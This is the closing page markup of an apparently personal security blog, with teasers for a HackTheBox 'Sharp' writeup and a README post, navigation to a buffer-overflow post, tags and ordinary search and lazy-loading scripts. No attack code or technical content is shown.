<span class="timeago small" > May 16 <i class="unloaded">2021-05-16T02:45:00+07:00</i> </span><h3 class="pt-0 mt-1 mb-3" data-toc-skip>HackTheBox - Sharp</h3><div class="text-muted small"><p> Hi, after a long time not posting anything on this blog because of my university workload. Let’s get back to our normal routine of pwning. Today, I will do a writeup of retired HackTheBox machine -...</p></div></div></a></div><div class="card"> <a href="/blog/en/posts/README/"><div class="card-body"> <!-- Date format snippet v2.4.1 https://github.com/cotes2020/jekyll-theme-chirpy © 2020 Cotes Chung MIT License --> <span class="timeago small" > Nov 24, 2020 <i class="unloaded">2020-11-24T03:51:22+07:00</i> </span><h3 class="pt-0 mt-1 mb-3" data-toc-skip>A README.md</h3><div class="text-muted small"><p> Welcome to my personal blog where I can share to people my thoughts and experience about (mostly) technology, research articles and sometimes irrelevant stuff. Topics on this blog are mainly about...</p></div></div></a></div></div></div><!-- Navigation buttons at the bottom of the post. v2.1 https://github.com/cotes2020/jekyll-theme-chirpy © 2020 Cotes Chung MIT License --><div class="post-navigation d-flex justify-content-between"> <a href="/blog/en/posts/README/" class="btn btn-outline-primary"><p>A README.md</p></a> <a href="/blog/en/posts/ez-bof/" class="btn btn-outline-primary"><p>A simple BOF - KCSC</p></a></div></div></div></div><script type="text/javascript" src="https://cdn.jsdelivr.net/npm/lozad/dist/lozad.min.js"></script> <script type="text/javascript"> const imgs = document.querySelectorAll('#post-wrapper img'); const observer = lozad(imgs); observer.observe(); </script> <!-- The Footer v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --><footer class="d-flex w-100 justify-content-center"><div class="d-flex justify-content-between align-items-center"><div class="footer-left"><p class="mb-0"> © 2021 <a href="https://twitter.com/0x7c00">Le Gia Huy</a>. <span data-toggle="tooltip" data-placement="top" title="Except where otherwise noted, the blog posts on this site are licensed under the Creative Commons Attribution 4.0 International (CC BY 4.0) License by the author.">Some rights reserved.</span></p></div><div class="footer-right"><p class="mb-0"> Powered by <a href="https://github.com" target="_blank">Github Pages</a></p></div></div></footer></div><!-- The Search results v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --><div id="search-result-wrapper" class="d-flex justify-content-center unloaded"><div class="col-12 col-xl-11 post-content"><div id="search-hints"><h4 class="text-muted mb-4">Trending Tags</h4><a class="post-tag" href="/blog/en/tags/pwn/">pwn</a> <a class="post-tag" href="/blog/en/tags/kma/">kma</a> <a class="post-tag" href="/blog/en/tags/web-pentest/">web pentest</a> <a class="post-tag" href="/blog/en/tags/thoughts/">thoughts</a> <a class="post-tag" href="/blog/en/tags/reverse-engineer/">reverse engineer</a> <a class="post-tag" href="/blog/en/tags/network/">network</a> <a class="post-tag" href="/blog/en/tags/hackthebox/">hackthebox</a></div><div id="search-results" class="d-flex flex-wrap justify-content-center text-muted mt-3"></div></div></div></div><div id="mask"></div><a id="back-to-top" href="#" class="btn btn-lg btn-box-shadow" role="button"> <i class="fas fa-angle-up"></i> </a> <!-- Jekyll Simple Search loader v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --> <script src="https://cdn.jsdelivr.net/npm/simple-jekyll-search@1.7.3/dest/simple-jekyll-search.min.js"></script> <script> SimpleJekyllSearch({ searchInput: document.getElementById('search-input'), resultsContainer: document.getElementById('search-results'), json: '/blog/en/assets/js/data/search.json', searchResultTemplate: '<div class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-lg-4 pr-lg-4 pl-xl-0 pr-xl-0"> <a href="https://legiahuyy.github.io/blog/en{url}">{title}</a><div class="post-meta d-flex flex-column flex-sm-row text-muted mt-1 mb-1"><div class="mr-sm-4"><i class="far fa-folder fa-fw"></i>{categories}</div><div><i class="fa fa-tag fa-fw"></i>{tags}</div></div><p>{snippet}</p></div>', noResultsText: '<p class="mt-5">Oops! No result founds.</p>' }); </script>
